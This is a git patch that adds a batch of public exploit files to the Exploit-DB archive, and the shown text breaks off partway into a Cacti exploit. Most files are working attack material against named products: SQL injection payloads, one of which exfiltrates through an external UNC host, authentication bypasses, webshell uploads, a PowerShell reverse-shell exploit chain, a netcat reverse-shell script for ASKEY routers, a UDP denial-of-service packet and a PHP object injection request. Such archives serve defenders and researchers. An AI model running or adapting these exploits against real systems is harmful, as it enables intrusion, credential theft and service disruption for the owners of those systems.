From 9b56e8731eb190562969bbef530dc280a735d21b Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sat, 1 Apr 2023 00:16:31 +0000 Subject: [PATCH] DB: 2023-04-01 25 changes to exploits/shellcodes/ghdb EQ Enterprise management system v2.2.0 - SQL Injection qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) ASKEY RTF3505VW-N1 - Privilege Escalation Bangresto 1.0 - SQL Injection Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated) Cacti v1.2.22 - Remote Command Execution (RCE) Judging Management System v1.0 - Authentication Bypass Judging Management System v1.0 - Remote Code Execution (RCE) rconfig 3.9.7 - Sql Injection (Authenticated) Senayan Library Management System v9.0.0 - SQL Injection Spitfire CMS 1.0.475 - PHP Object Injection Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) WooCommerce v7.1.0 - Remote Code Execution(RCE) CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset SOUND4 Server Service 4.1.102 - Local Privilege Escalation macOS/x64 - Execve Null-Free Shellcode --- exploits/asp/webapps/51154.txt | 24 ++++ exploits/hardware/dos/51157.py | 24 ++++ exploits/hardware/remote/51155.sh | 67 +++++++++ exploits/php/webapps/51156.txt | 27 ++++ exploits/php/webapps/51160.txt | 139 +++++++++++++++++++ exploits/php/webapps/51161.txt | 62 +++++++++ exploits/php/webapps/51162.txt | 58 ++++++++ exploits/php/webapps/51163.py | 76 +++++++++++ exploits/php/webapps/51164.py | 118 ++++++++++++++++ exploits/php/webapps/51165.txt | 36 +++++ exploits/php/webapps/51166.py | 69 ++++++++++ exploits/php/webapps/51175.txt | 56 ++++++++ exploits/php/webapps/51176.txt | 132 ++++++++++++++++++ exploits/windows/local/51159.txt | 32 +++++ exploits/windows/local/51167.txt | 61 +++++++++ exploits/windows/local/51168.txt | 69 ++++++++++ exploits/windows/local/51169.txt | 165 +++++++++++++++++++++++ exploits/windows/local/51170.txt | 74 ++++++++++ exploits/windows/local/51171.txt | 67 +++++++++ exploits/windows/local/51172.txt | 80 +++++++++++ exploits/windows/local/51173.txt | 75 +++++++++++ exploits/windows/local/51174.txt | 68 ++++++++++ files_exploits.csv | 22 +++ files_shellcodes.csv | 1 + shellcodes/macos/51177.txt | 216 ++++++++++++++++++++++++++++++ 25 files changed, 1818 insertions(+) create mode 100644 exploits/asp/webapps/51154.txt create mode 100755 exploits/hardware/dos/51157.py create mode 100755 exploits/hardware/remote/51155.sh create mode 100644 exploits/php/webapps/51156.txt create mode 100644 exploits/php/webapps/51160.txt create mode 100644 exploits/php/webapps/51161.txt create mode 100644 exploits/php/webapps/51162.txt create mode 100755 exploits/php/webapps/51163.py create mode 100755 exploits/php/webapps/51164.py create mode 100644 exploits/php/webapps/51165.txt create mode 100755 exploits/php/webapps/51166.py create mode 100644 exploits/php/webapps/51175.txt create mode 100644 exploits/php/webapps/51176.txt create mode 100644 exploits/windows/local/51159.txt create mode 100644 exploits/windows/local/51167.txt create mode 100644 exploits/windows/local/51168.txt create mode 100644 exploits/windows/local/51169.txt create mode 100644 exploits/windows/local/51170.txt create mode 100644 exploits/windows/local/51171.txt create mode 100644 exploits/windows/local/51172.txt create mode 100644 exploits/windows/local/51173.txt create mode 100644 exploits/windows/local/51174.txt create mode 100644 shellcodes/macos/51177.txt diff --git a/exploits/asp/webapps/51154.txt b/exploits/asp/webapps/51154.txt new file mode 100644 index 000000000..fcbe70db1 --- /dev/null +++ b/exploits/asp/webapps/51154.txt @@ -0,0 +1,24 @@ +Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection +Date: 2022.12.7 +Exploit Author: TLF +Vendor Homepage: https://www.yiquantech.com/pc/about.html +Software Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/ +Version: EQ v1.5.31 to v2.2.0 +Tested on: windows 10 +CVE : CVE-2022-45297 + + +POC: +POST /Account/Login HTTP/1.1 +Host: 121.8.146.131 +User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Content-Length: 118 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded; +charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg +Origin: http://121.8.146.131 +Referer: http://121.8.146.131/Account/Login +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip +RememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27 \ No newline at end of file diff --git a/exploits/hardware/dos/51157.py b/exploits/hardware/dos/51157.py new file mode 100755 index 000000000..5bf9e7428 --- /dev/null +++ b/exploits/hardware/dos/51157.py @@ -0,0 +1,24 @@ +# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) +# Date: 2022-12-04 +# Exploit Author: Krzysztof Burghardt +# Vendor Homepage: https://mirage.io/blog/MSA03 +# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases +# Version: >= 0.8.0 & < 0.8.4 +# Tested on: Qubes OS +# CVE: CVE-2022-46770 + +#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166 + +#!/usr/bin/env python3 + +from socket import socket, AF_INET, SOCK_DGRAM + +TARGET = "239.255.255.250" + +PORT = 5353 + +PAYLOAD = b'a' * 607 + +s = socket(AF_INET, SOCK_DGRAM) + +s.sendto(PAYLOAD, (TARGET, PORT)) \ No newline at end of file diff --git a/exploits/hardware/remote/51155.sh b/exploits/hardware/remote/51155.sh new file mode 100755 index 000000000..536fbebfc --- /dev/null +++ b/exploits/hardware/remote/51155.sh @@ -0,0 +1,67 @@ +# Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation +# Date: 07-12-2022 +# Exploit Author: Leonardo Nicolas Servalli +# Vendor Homepage: www.askey.com +# Platform: ASKEY router devices RTF3505VW-N1 +# Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7 +# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md + +#Description: +#---------- + +# Mitrastar ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials). + +# The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using “;/bin/bash” as injected string we can spawn a busybox/ash console. + +#Exploit: +#-------- +#!/usr/bin/bash + +if [ -z "$@" ]; then + echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell " + exit 0 +fi + +for K in $(seq 1 15) # Attemps +do + +echo "**************************************************************************************" +echo "******************************** Attempt number $K ************************************" +echo "**************************************************************************************" + +for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 & # start a background loop injecting the string ";/bin/bash" on the port 80 of the router + +# Expect script for interact with the router through SSH, login, launch the tcpdump with the option "-z sh", and finally launch a more stable busybox reverse shell to our listener +/usr/bin/expect << EOD + spawn ssh $2@$1 + expect { + "password: " { + send "$3\r" + expect ">" + send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r" # filter by source port 8888 + } + "yes/no" { + send "yes\r" + #exp_continue + } + } + set timeout 2 + expect { + timeout { + puts "Timeout..." + send "exit\r" + exit 0 + } + + "*usy*ox" { + expect "#" + send "rm /tmp/runme* \r" + send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r" + puts "Rooted !!!!!!!!!" + set timeout -1 + expect "NEVER_APPEARING_STRING#" # wait an infinite time to mantain the rverse shell open + } + } +EOD + +done \ No newline at end of file diff --git a/exploits/php/webapps/51156.txt b/exploits/php/webapps/51156.txt new file mode 100644 index 000000000..14adfec39 --- /dev/null +++ b/exploits/php/webapps/51156.txt @@ -0,0 +1,27 @@ +# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE) +# Date: 2022-12-07 +# Author: Milad Karimi +# Vendor Homepage: https://wordpress.org/plugins/woocommerce +# Software Link: https://wordpress.org/plugins/woocommerce +# Tested on: windows 10 , firefox +# Version: 7.1.0 +# CVE : N/A + +# Description: +simple, easy to use jQuery frontend to php backend that pings various +devices and changes colors from green to red depending on if device is +up or down. + +# PoC : + +http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '' >info.php +http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '' >info.php + + +# Vulnerabile code: + + 95: $classname $classname($post_id); +  94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple'); +    92: ⇓ function save($post_id, $post) +       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type'])); +          92: ⇓ function save($post_id, $post) \ No newline at end of file diff --git a/exploits/php/webapps/51160.txt b/exploits/php/webapps/51160.txt new file mode 100644 index 000000000..10abd0016 --- /dev/null +++ b/exploits/php/webapps/51160.txt @@ -0,0 +1,139 @@ +# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated) +# Exploit Author: Alperen Ergel +# Contact: @alpernae (IG/TW) +# Software Homepage: https://www.bludit.com/ +# Version : 3-14-1 +# Tested on: windows 11 wampserver | Kali linux +# Category: WebApp +# Google Dork: intext:'2022 Powered by Bludit' +# Date: 8.12.2022 +######## Description ######## +# +# Step 1 : Archive as a zip your webshell (example: payload.zip) +# Step 2 : Login admin account and download 'UploadPlugin' +# Step 3 : Go to UploadPlugin section +# Step 4 : Upload your zip +# Step 5 : target/bl-plugins/[your_payload] +# +######## Proof of Concept ######## + + +==============> START REQUEST <======================================== + +POST /admin/plugin/uploadplugin HTTP/2 +Host: localhost +Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264 +Content-Length: 1820 +Origin: https://036e-88-235-222-210.eu.ngrok.io +Dnt: 1 +Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers + +-----------------------------308003478615795926433430552264 +Content-Disposition: form-data; name="tokenCSRF" + +b6487f985b68f2ac2c2d79b4428dda44696d6231 +-----------------------------308003478615795926433430552264 +Content-Disposition: form-data; name="pluginorthemes" + +plugins +-----------------------------308003478615795926433430552264 +Content-Disposition: form-data; name="zip_file"; filename="a.zip" +Content-Type: application/zip + +PK †eˆU  a/PK  ”fˆUÆ ª)¢ Ä + a/a.phpíVێÓ0}ç+La BÛìVܖpX®ËJ @V꺭!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/. pÝãZ+M5/•¶BÎÈ0>©M†[jłÓB,„õtO̤Ҝ. +×4;’†e)¨ƒ¼Èה¯9[Z¡dðÆ „Œ&Âd<ó`÷+œN—’y¼Á +RLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯ p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“ +j±u +\õ„±†à/ï¾Îޞ´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ% +µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þǸ0yÕU¥H"ÕÕÿI IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj. +îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ï +e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷ +kC57j©'Î"m + ã®ho¹ xŸô Û;’œcçzÙQ +Ë·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ ØIϲòÖ`Ð:%F½$A"t;buOMr4Ýè~–eãΙåØXíÇm˜Ç(s 6A¸3,l>º…yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_ D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK? †eˆU  $ €íA a/ +   þš®, +Ù þš®, +Ù€ø¨j. +ÙPK?  ”fˆUÆ ª)¢ Ä + $ €¤ a/a.php +   ¤eÝ- +Ù ÷C- +Ù bj. +ÙPK   ­ ç +-----------------------------308003478615795926433430552264 +Content-Disposition: form-data; name="submit" + +Upload +-----------------------------308003478615795926433430552264-- + + +==============> END REQUEST <======================================== + +## WEB SHELL UPLOADED! + +==============> START RESPONSE <======================================== + +HTTP/2 200 OK +Cache-Control: no-store, no-cache, must-revalidate +Content-Type: text/html; charset=UTF-8 +Date: Thu, 08 Dec 2022 18:01:43 GMT +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4 +Pragma: no-cache +Server: Apache/2.4.51 (Win64) PHP/7.4.26 +X-Powered-By: Bludit +. +. +. +. + +==============> END RESPONSE <======================================== + +# REQUEST THE WEB SHELL + +==============> START REQUEST <======================================== + +GET /bl-plugins/a/a.php?cmd=whoami HTTP/2 +Host: localhost +Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers + +==============> END REQUEST <======================================== + +==============> START RESPONSE <======================================== + +HTTP/2 200 OK +Content-Type: text/html; charset=UTF-8 +Date: Thu, 08 Dec 2022 18:13:14 GMT +Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919 +Server: Apache/2.4.51 (Win64) PHP/7.4.26 +X-Powered-By: PHP/7.4.26 +Content-Length: 32 + +
nt authority\system
+
+ +==============> END RESPONSE <======================================== \ No newline at end of file diff --git a/exploits/php/webapps/51161.txt b/exploits/php/webapps/51161.txt new file mode 100644 index 000000000..43cd6524d --- /dev/null +++ b/exploits/php/webapps/51161.txt @@ -0,0 +1,62 @@ +## Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection +## Author: nu11secur1ty +## Date: 11.09.2022 +## Vendor: https://slims.web.id/web/ +## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi + +## Description: +The manual insertion `point 3` with `class` parameter appears to be +vulnerable to SQL injection attacks. +The payload '+(select +load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+' +was submitted in the manual insertion point 3. +This payload injects a SQL sub-query that calls MySQL's load_file +function with a UNC file path that references a URL on an external +domain. +The application interacted with that domain, indicating that the +injected SQL query was executed. + +## STATUS: HIGH Vulnerability + +[+] Payload: + +```MySQL +--- +Parameter: class (GET) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY +or GROUP BY clause + Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT +(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND +'dLjf'='dLjf&membershipType=a&collType=aaaa +--- +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi) + +## Proof and Exploit: +[href](http://localhost:5001/sy5wji) + +## Time spent +`03:00:00` + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51162.txt b/exploits/php/webapps/51162.txt new file mode 100644 index 000000000..99b38395c --- /dev/null +++ b/exploits/php/webapps/51162.txt @@ -0,0 +1,58 @@ +# Exploit Title: Spitfire CMS 1.0.475 - PHP Object Injection +# Exploit Author: LiquidWorm +Vendor: Claus Muus +Product web page: http://spitfire.clausmuus.de +Affected version: 1.0.475 + +Summary: Spitfire is a system to manage the content of webpages. + +Desc: The application is prone to a PHP Object Injection vulnerability +due to the unsafe use of unserialize() function. A potential attacker, +authenticated, could exploit this vulnerability by sending specially +crafted requests to the web application containing malicious serialized +input. + +----------------------------------------------------------------------- +cms/edit/tpl_backup.inc.php: +---------------------------- +47: private function status () +48: { +49: $status = array (); +50: +51: $status['values'] = array (); +52: $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array (); +... +... +77: public function save ($values) +78: { +79: $values = array_merge ($this->status['values'], $values); +80: setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30); +81: } +----------------------------------------------------------------------- + +Tested on: nginx + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5720 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php + + +28.09.2022 + +-- + + +> curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \ + -H 'Content-Type: application/x-www-form-urlencoded' + -H 'Accept: */*' + -H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup' + -H 'Accept-Encoding: gzip, deflate' + -H 'Accept-Language: en-US,en;q=0.9' + -H 'Connection: close' \ + -H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \ + --data 'action=save&&value=1' + #--data 'action=save&&value[files]={}' \ No newline at end of file diff --git a/exploits/php/webapps/51163.py b/exploits/php/webapps/51163.py new file mode 100755 index 000000000..d6c494fcd --- /dev/null +++ b/exploits/php/webapps/51163.py @@ -0,0 +1,76 @@ +# Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated) +# Exploit Author: azhen +# Date: 10/12/2022 +# Vendor Homepage: https://www.rconfig.com/ +# Software Link: https://www.rconfig.com/ +# Vendor: rConfig +# Version: <= v3.9.7 +# Tested against Server Host: Linux +# CVE: CVE-2022-45030 + +import requests +import sys +import urllib3 +urllib3.disable_warnings() + +s = requests.Session() + +# sys.argv.append("192.168.10.150") #Enter the hostname + +if len(sys.argv) != 2: + print("Usage: python3 rconfig_sqli_3.9.7.py ") + sys.exit(1) + +host=sys.argv[1] #Enter the hostname + + +def get_data(host): + print("[+] Get db data...") + vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20" + + query_exp = "database()" + result_data = "" + + for i in range(1, 100): + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"} + res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False) + # print(res.text) + + a = chr(int(res.text[6:10]) - 1000) + + if a == '\x00': + break + + result_data += a + + print(result_data) + + print("[+] Database name: {}".format(result_data)) + + ''' + output: + [+] Logging in... + [+] Get db data... + r + rc + rco + rcon + rconf + rconfi + rconfig + rconfigd + rconfigdb + [+] Database name: rconfigdb + ''' + + +def login(host): + print("[+] Logging in...") + url = "https://"+host+":443/lib/crud/userprocess.php" + headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"} + + data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin + response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False) + get_data(host) + +login(host) \ No newline at end of file diff --git a/exploits/php/webapps/51164.py b/exploits/php/webapps/51164.py new file mode 100755 index 000000000..adbfc8e01 --- /dev/null +++ b/exploits/php/webapps/51164.py @@ -0,0 +1,118 @@ +# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE) +# Date: 12/11/2022 +# Exploit Author: Angelo Pio Amirante +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html +# Version: 1.0 +# Tested on: Windows 10 on XAAMP server + + +import requests,argparse,re,time,base64 +import urllib.parse +from colorama import (Fore as F,Back as B,Style as S) +from bs4 import BeautifulSoup + + +BANNER = """ +╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗ +║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║ +╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝ + +""" + +def argsetup(): + desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)' + parser = argparse.ArgumentParser(description=desc) + parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True) + parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) + parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) + args = parser.parse_args() + return args + +# Performs Auth bypass in order to get the admin cookie +def auth_bypass(args): + print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...") + session = requests.Session() + loginUrl = f"{args.target}/login.php" + + username = """' OR 1=1-- -""" + password = "randomvalue1234" + data = {'username': username, 'password': password} + + login = session.post(loginUrl,verify=False,data=data) + admin_cookie = login.cookies['PHPSESSID'] + print(F.GREEN+"[+] Admin cookies obtained !!!") + return admin_cookie + +# Checks if the file has been uploaded to /uploads directory +def check_file(args,cookie): + uploads_endpoint = f"{args.target}/uploads/" + cookies = {'PHPSESSID': f'{cookie}'} + req = requests.get(uploads_endpoint,verify=False,cookies=cookies) + soup = BeautifulSoup(req.text,features='html.parser') + files = soup.find_all("a") + for i in range (len(files)): + match = re.search(".*-shelljudgesystem\.php",files[i].get('href')) + if match: + file = files[i].get('href') + print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file) + return file + + + return None + +def file_upload(args,cookie): + now = int(time.time()) + endpoint = f"{args.target}/edit_organizer.php" + cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'} + get_req = requests.get(endpoint,verify=False,cookies=cookies) + soup = BeautifulSoup(get_req.text,features='html.parser') + username = soup.find("input",{"name":"username"}).get('value') + admin_password = soup.find("input",{"id":"password"}).get('value') + print(F.GREEN + "[+] Admin username: " + username) + print(F.GREEN + "[+] Admin password: " + admin_password) + + + # Multi-part request + file_dict = { + 'fname':(None,"Random"), + 'mname':(None,"Random"), + 'lname':(None,"Random"), + 'email':(None,"ranom@mail.com"), + 'pnum':(None,"014564343"), + 'cname':(None,"Random"), + 'caddress':(None,"Random"), + 'ctelephone':(None,"928928392"), + 'cemail':(None,"company@mail.com"), + 'cwebsite':(None,"http://company.com"), + 'file':("shelljudgesystem.php","","application/octet-stream"), + 'username':(None,f"{admin_password}"), + 'passwordx':(None,f"{admin_password}"), + 'password2x':(None,f"{admin_password}"), + 'password':(None,f"{admin_password}"), + 'update':(None,"") + } + + req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict) + + +def exploit(args,cookie,file): + payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """ + uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}" + cookies = {'PHPSESSID': f'{cookie}'} + print(F.GREEN + "\n[+] Enjoy your reverse shell ") + requests.get(uploads_endpoint,verify=False,cookies=cookies) + + + +if __name__ == '__main__': + print(F.CYAN + BANNER) + args = argsetup() + cookie=auth_bypass(args=args) + file_upload(args=args,cookie=cookie) + file_name=check_file(args=args,cookie=cookie) + if file_name is not None: + exploit(args=args,cookie=cookie,file=file_name) + + else: + print(F.RED + "[!] File not found") \ No newline at end of file diff --git a/exploits/php/webapps/51165.txt b/exploits/php/webapps/51165.txt new file mode 100644 index 000000000..232adc26c --- /dev/null +++ b/exploits/php/webapps/51165.txt @@ -0,0 +1,36 @@ +# Exploit Title: Judging Management System v1.0 - Authentication Bypass +# Date: 12/11/2022 +# Exploit Author: Angelo Pio Amirante +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html +# Version: 1.0 +# Tested on: Windows 10 on XAAMP server + +# Vulnerability: An attacker can bypass login page and access to dashboard page +# Vulnerable file: login.php +# Exploit: + +1) Go to: http://localhost/php-jms/index.php +2) As username use this payload: 'or 1=1-- - +3) Use random words for password + + +POST /php-jms/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 37 +Origin: http://localhost +Connection: close +Referer: http://localhost/php-jms/index.php +Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782. +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +username=%27or+1%3D1--+-&password=asa \ No newline at end of file diff --git a/exploits/php/webapps/51166.py b/exploits/php/webapps/51166.py new file mode 100755 index 000000000..3f493dd65 --- /dev/null +++ b/exploits/php/webapps/51166.py @@ -0,0 +1,69 @@ +# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE) +# Exploit Author: Riadh BOUCHAHOUA +# Discovery Date: 2022-12-08 +# Vendor Homepage: https://www.cacti.net/ +# Software Links : https://github.com/Cacti/cacti +# Tested Version: 1.2.2x <= 1.2.22 +# CVE: CVE-2022-46169 +# Tested on OS: Debian 10/11 + +#!/usr/bin/env python3 +import random +import httpx, urllib + +class Exploit: + def __init__(self, url, proxy=None, rs_host="",rs_port=""): + self.url = url + self.session = httpx.Client(headers={"User-Agent": 